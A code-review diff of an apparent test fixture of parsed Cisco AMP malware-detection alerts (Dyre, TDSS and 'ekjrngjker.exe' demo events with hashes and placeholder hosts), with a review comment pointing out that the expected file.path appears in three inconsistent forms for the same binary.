"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 266668, + "log.offset": 30055, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4651,60 +1029,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:13.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 874000000, + "cisco.amp.timestamp_nanoseconds": 926000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257688561779000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 267987, + "log.offset": 31381, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4712,60 +1094,64 @@ ] }, { - "@timestamp": "2021-01-15T10:12:02.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 236000000, + "cisco.amp.timestamp_nanoseconds": 533000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257641317138000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 269306, + "log.offset": 32700, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4773,7 +1159,7 @@ ] }, { - "@timestamp": "2021-01-15T10:11:52.000Z", + "@timestamp": "2021-01-15T10:22:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -4784,42 +1170,39 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667317698527247", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 641000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667317698527000, + "event.id": 15212386047828, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 270625, + "log.offset": 34019, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" ], "related.hosts": [ "Demo_AMP_Threat_Audit" 
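Review bot: The expected `file.path` for the "Executed malware" event is `file:///C%3A/ekjrngjker.exe`, a percent-encoded file URI, while the neighbouring events for the same file expect `C:\\ekjrngjker.exe` or `\\\\?\\C:\\ekjrngjker.exe`. A search or detection rule keyed on one path form will miss the other two, even though `file.hash.sha256` shows they are the same binary. The ingest pipeline is not visible in this hunk, so this is inferred from the fixture alone. It would be worth decoding the URI (and probably stripping the `\\?\` prefix) so that all three cases expect `"file.path": "C:\\ekjrngjker.exe"`.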
@@ -4828,9 +1211,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4838,60 +1218,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:50.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 224000000, + "cisco.amp.timestamp_nanoseconds": 973000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257589777531000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 274588, + "log.offset": 35375, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4899,60 +1285,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:44.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643249", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 218000000, + "cisco.amp.timestamp_nanoseconds": 951000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257564007727000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 275907, + "log.offset": 36701, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4960,60 +1350,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:32.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643248", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 581000000, + "cisco.amp.timestamp_nanoseconds": 576000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257512468120000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 277226, + "log.offset": 38020, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -5021,60 +1415,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:20.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 569000000, + "cisco.amp.timestamp_nanoseconds": 333000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257460928512000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 278545, + "log.offset": 39339, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -5082,64 +1482,58 @@ ] }, { - "@timestamp": "2021-01-15T10:11:18.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605486", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 875000000, + "cisco.amp.timestamp_nanoseconds": 195000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617812646789000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", - "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", - "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "file.name": "5A.tmp", - "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.os.family": "windows", 
"host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 279864, - "process.hash.md5": "60784f891563fb1b767f70117fc2428f", - "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", - "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", - "process.name": "spoolsv.exe", - "process.pid": 1480, + "log.offset": 40665, "related.hash": [ - "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "bfcc0861c7fb965c1f7473d3dc42cff6", - "420da91c3199993c9f245b21ea060b69d7ecfd49" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", 
@@ -5155,62 +1549,56 @@ ] }, { - "@timestamp": "2021-01-15T10:11:17.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605485", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 812000000, + "cisco.amp.timestamp_nanoseconds": 170000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617808351822000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "59.tmp", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", + 
"host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 287092, - "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "process.name": "tdss.exe", - "process.pid": 3728, + "log.offset": 41991, "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", 
@@ -5226,60 +1614,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:09.000Z", + "@timestamp": "2021-01-15T10:20:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 56000000, + "cisco.amp.timestamp_nanoseconds": 779000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257413683872000, + "event.id": 6533669667045638000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", 
